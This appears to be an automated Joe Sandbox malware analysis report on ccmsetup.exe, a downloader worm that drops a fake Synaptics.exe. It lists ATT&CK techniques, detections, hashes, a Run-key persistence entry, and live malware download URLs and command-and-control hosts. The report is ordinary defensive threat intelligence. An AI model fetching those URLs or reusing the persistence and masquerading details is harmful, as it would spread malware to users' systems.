                              Source: Yara match File source: Process Memory Space: ccmsetup.exe PID: 4512, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 2180, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information41
                              Scripting
                              1
                              Replication Through Removable Media
                              3
                              Native API
                              41
                              Scripting
                              1
                              DLL Side-Loading
                              1
                              Deobfuscate/Decode Files or Information
                              OS Credential Dumping2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              3
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter
                              1
                              DLL Side-Loading
                              1
                              Access Token Manipulation
                              2
                              Obfuscated Files or Information
                              LSASS Memory1
                              Peripheral Device Discovery
                              Remote Desktop ProtocolData from Removable Media21
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              14
                              Windows Service
                              14
                              Windows Service
                              1
                              Install Root Certificate
                              Security Account Manager4
                              File and Directory Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts12
                              Service Execution
                              1
                              Scheduled Task/Job
                              11
                              Process Injection
                              1
                              DLL Side-Loading
                              NTDS15
                              System Information Discovery
                              Distributed Component Object ModelInput Capture34
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Registry Run Keys / Startup Folder
                              1
                              Scheduled Task/Job
                              22
                              Masquerading
                              LSA Secrets1
                              Query Registry
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Registry Run Keys / Startup Folder
                              31
                              Virtualization/Sandbox Evasion
                              Cached Domain Credentials151
                              Security Software Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Access Token Manipulation
                              DCSync1
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Process Injection
                              Proc Filesystem31
                              Virtualization/Sandbox Evasion
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                              System Network Configuration Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              [Behavior graph (image not captured): ID 1569604, Sample: ccmsetup.exe, Start date: 05/12/2024, Architecture: WINDOWS, Score: 100]

                              Source | Detection | Scanner | Label | Link
                              ccmsetup.exe | 92% | ReversingLabs | Win32.Worm.Zorex |
                              ccmsetup.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              ccmsetup.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              ccmsetup.exe | 100% | Joe Sandbox ML | |
                              Source | Detection | Scanner | Label | Link
                              C:\ProgramData\Synaptics\RCXD7AF.tmp | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\RCXD7AF.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\ProgramData\Synaptics\RCXD7AF.tmp | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\RCXD7AF.tmp | 92% | ReversingLabs | Win32.Worm.Zorex |
                              C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Worm.Zorex |
                              C:\Users\user\Desktop\._cache_ccmsetup.exe | 0% | ReversingLabs | |
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |
                              No Antivirus matches
                              No Antivirus matches
                              Source | Detection | Scanner | Label | Link
                              http://%s/%s/.sms_aut?SITESIGNCERT | 0% | Avira URL Cloud | safe |
                              http://%s/SMS_MP/.sms_aut?SMSTRC | 0% | Avira URL Cloud | safe |
                              http://xred.site50.net/syn/Synaptics.rarZ | 100% | Avira URL Cloud | malware |
                              http://xred.site50.net/syn/SSLLibrary.dll6 | 100% | Avira URL Cloud | malware |
                              http://%s/SMS_MP/.sms_aut?SMSTRC.. | 0% | Avira URL Cloud | safe |
                              http://xred.site50.net/syn/SUpdate.iniZ | 100% | Avira URL Cloud | malware |
                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              freedns.afraid.org | 69.42.215.252 | true | false | | high
                              docs.google.com | 172.217.19.238 | true | false | | high
                              drive.usercontent.google.com | 142.250.181.129 | true | false | | high
                              s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
                              xred.mooo.com | unknown | unknown | false | | high
                              Name | Malicious | Antivirus Detection | Reputation
                              xred.mooo.com | false | | high
                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
                              Name | Source | Malicious | Antivirus Detection | Reputation
                              https://login.windows.net/common | ._cache_ccmsetup.exe | false | | high
                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl= | ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp | false | | high
                              https://login.windows.net | ._cache_ccmsetup.exe | false | | high
                              http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | ~$cache1.3.dr | false | | high
                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R | Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmp | false | | high
                              https://drive.usercontent.google.com/ | Synaptics.exe, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp | false | | high
                              http://upx.sf.net | Amcache.hve.12.dr | false | | high
                                                            http://xred.site50.net/syn/Synaptics.rar~$cache1.3.drfalse
                                                              high
                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlPccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.google.com/eSynaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://%s/SMS_MP/.sms_aut?SMSTRC..ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://docs.google.com/Synaptics.exe, 00000003.00000003.2152405545.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://%s/SMS_MP/.sms_aut?SMSTRC._cache_ccmsetup.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://xred.site50.net/syn/SSLLibrary.dlccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://login.microsoftonline.com/common/oauth2/token._cache_ccmsetup.exefalse
                                                                          high
                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1~$cache1.3.drfalse
                                                                            high
                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~$cache1.3.drfalse
                                                                              high
                                                                              http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://xred.site50.net/syn/SUpdate.ini~$cache1.3.drfalse
                                                                                high
                                                                                http://%s/%s/.sms_aut?SITESIGNCERT._cache_ccmsetup.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978pccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.3004223452.000000000DC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3017129835.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060328812.000000002633E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032972975.00000000185FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029759770.0000000015CBE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://xred.site50.net/syn/SSLLibrary.dll~$cache1.3.drfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.217.19.238 | docs.google.com | United States | 15169 | GOOGLEUS | false |
| 13.107.246.63 | s-part-0035.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 142.250.181.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
| 69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569604
Start date and time: 2024-12-05 22:49:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ccmsetup.exe
Detection: MAL
Classification: mal100.bank.troj.expl.evad.winEXE@13/33@11/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 103
• Number of non-executed functions: 184
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 20.189.173.5, 52.182.143.212
                                                                                        • Excluded domains from analysis (whitelisted): onedscolprdwus04.westus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 2180 because there are no executed function
                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: ccmsetup.exe
| Time | Type | Description |
|---|---|---|
| 16:50:05 | API Interceptor | 446x Sleep call for process: Synaptics.exe modified |
| 16:51:03 | API Interceptor | 3x Sleep call for process: WerFault.exe modified |
| 22:50:02 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe |
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        28a2c9bd18a11de089ef85a160da29e4https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        17334181261974bf64e3aa3bbac8bf525f91f1e7e877c7dc9d79fa20f782fc960f960876a5125.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 13.107.246.63
                                                                                        1733418140de6eff55fb568a29814debaf3ad46ee7119730b1019aa5b47c07d232cf03fefd427.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                                                                                        • 13.107.246.63
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        PHuHRcCpaJ.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        EI0WLvSYFS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        37f463bf4616ecd445d4a1937da06e19Setup.exeGet hashmaliciousVidarBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        Setup.exeGet hashmaliciousVidarBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        DKfcEFnBtm.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        vj3dH1vmYe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        NIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        TPDKSYfEac.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        YQbn27ZkYY.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        FWAvf7mctB.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        3FodBfenJs.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        No context
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):118
                                                                                        Entropy (8bit):3.5700810731231707
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2166317896137713
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:6xZVpsCImg0BU/3DzJDzqjICB4HpOe1IzuiFyZ24IO8EKDzy:WyCRBU/3JqjIyFzuiFyY4IO8zy
                                                                                        MD5:F2AA287FD9C5C5BE735136F7802C8358
                                                                                        SHA1:1A48FEF5AC705056FBE537F30F511DC65F00A1F9
                                                                                        SHA-256:9E9A3993C915A697CCCE9A7E5A4C69219B5F4E18349794A988B97BE96FB580F2
                                                                                        SHA-512:1449DC85AA349FE986A5E2A53FF5514704AED2C2F713D73D859D23087A2982B5C28A06E1AE2FF21BB7071E33FC3CA3F7AE320093D8F8CC455E34DC4D09FC3192
                                                                                        Malicious:false
                                                                                        Preview:Version=1..EventType=APPCRASH..EventTime=133779090528688225..ReportType=2..Consent=1..UploadTime=133779090588844517..ReportStatus=524384..ReportIdentifier=365350a5-963b-4015-8427-0ff55e835ee1..IntegratorReportIdentifier=568bc377-523e-4abe-b06a-5f6e1db5f91f..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00000884-0001-0014-34ed-caa05f47db01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000fa802f233890198365c3273def15399f074610c5!Synaptics.exe..TargetAppVe
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2164474895621429
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:v9tGZVpsXImE0jM3ODzJDzqjICB4HpOe1IzuiFyZ24IO8EKDzy:Ft8yXFjM3OJqjIyFzuiFyY4IO8zy
                                                                                        MD5:1D7AA66AD96CBA0D6E68D8EEA1E605EB
                                                                                        SHA1:1C6F36274987ACE6DB60CADC207E0ACF94FA22CC
                                                                                        SHA-256:F55024DB9463FA3F5262DF6A0F1C013C5D7C6CDE057B856DB7F2569E9A01A1D5
                                                                                        SHA-512:6192A72B37EAD0A005B950F0D4F9291484DA697F946CFF899C52E9951BBE12E9E290994F4A6FD31544C32DA7E1CB878C830AB38D189FBBC534550A8910FB2EDB
                                                                                        Malicious:false
                                                                                        Preview:Version=1..EventType=APPCRASH..EventTime=133779090642645807..ReportType=2..Consent=1..UploadTime=133779090743895647..ReportStatus=524384..ReportIdentifier=65defd3e-99d8-47e2-97a8-a54b4277c1dd..IntegratorReportIdentifier=2b8338c1-73a6-457c-aae1-9a0c790e7e7a..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00000884-0001-0014-34ed-caa05f47db01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000fa802f233890198365c3273def15399f074610c5!Synaptics.exe..TargetAppVe
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2164665219262554
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:upZVpswI40WbkODzJDzqjICB4HpOe1IzuiFrZ24IO8EKDzyA:6ywWWbkOJqjIyFzuiFrY4IO8zyA
                                                                                        MD5:6AB6A8F1CDB6612ED71589533FA5EF8E
                                                                                        SHA1:4246B5A548763E5ECD3F84AAC49DFF5B3C3BC7B4
                                                                                        SHA-256:048156AAB65E984AED12EBB2F2E71792ED081EA91E5D7135E64629C771CA7A9E
                                                                                        SHA-512:F6E0A311089FC5375D478DD2E25DEF83B195BA7FC359D1097148B54395B69D21DFBC728AD1A81AE3F8EC2214079B67DD0D4F935286EAC8DAE73C71B28C62871D
                                                                                        Malicious:false
                                                                                        Preview:Version=1..EventType=APPCRASH..EventTime=133779090801891559..ReportType=2..Consent=1..UploadTime=133779090856266609..ReportStatus=655456..ReportIdentifier=ae71bdbd-1dbd-4019-a00d-211278b71737..IntegratorReportIdentifier=2304ad58-b924-4779-92f6-bde5692dc342..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00000884-0001-0014-34ed-caa05f47db01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000fa802f233890198365c3273def15399f074610c5!Synaptics.exe..TargetAppVe
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.439164345970838
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZ0Jg77aI9ZbSWpW8VYCPYm8M4JFWFA2+q84cNZad:uIjfMI7fbz7VjSJd2KNZad
                                                                                        MD5:2593ED39B4C400C0D9F06508350814ED
                                                                                        SHA1:A7487AA4B4F90CCD2AF290DE03A60DBE47425519
                                                                                        SHA-256:BB60EDE0BF58530B249454110F6BA7A608D6C52AC31C623980B74B5F1799A77F
                                                                                        SHA-512:699D04A00C7DEE329D6358DE0726557794756F405A3BB6FB27B48295E4D0098FAA5FF0D547B322506573C6A91707A97AA7AE60A77B27569A777FB740480ABEE2
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618533" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Dec 5 21:51:22 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):171364
                                                                                        Entropy (8bit):2.70292092687816
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:FJMyqPzAkvXGH8FWAb4P3utiDGZ1Uumx8c:33qdvWH8AA/XUwc
                                                                                        MD5:80829A3D6A725C171BD17936B19E58B8
                                                                                        SHA1:15E7040D0607AEB3B77F304D6EAD338BD1B2ED08
                                                                                        SHA-256:032B1A97673731D09B1928B8DDD8CF571E03C727B290FB21D45C143C16D48620
                                                                                        SHA-512:C9F57440DF9D91212F7C78BB097F3274AE95266BABF8A100489FE4BDDD0A7B29713278079556BCDF4355AC747D5A2319874DBAF4D1FB894AC13DC18F436FDA28
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6328
                                                                                        Entropy (8bit):3.6945850098844057
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJqxB6yK+QOMYirJk2pD789bXJsf0edm:R6lXJM6P+QOMYGJkvXif8
                                                                                        MD5:169770B85E850443EDC5FFBBA938BF33
                                                                                        SHA1:4F39966760DCEC98A27E3E749EE9B5CEAACC9ED6
                                                                                        SHA-256:F073651071A90C41B05EC9D20899CE2D0244DFF842D89ACFEE8E29E5EE983224
                                                                                        SHA-512:30A55B2BCE363B488593C16A56D81B387BB7123E706A2E90CF4D972C6DC6346E9EB05B011015329D22393B9FE42F1A2107C11CAF4AF3561858556DC60097B553
                                                                                        Malicious:false
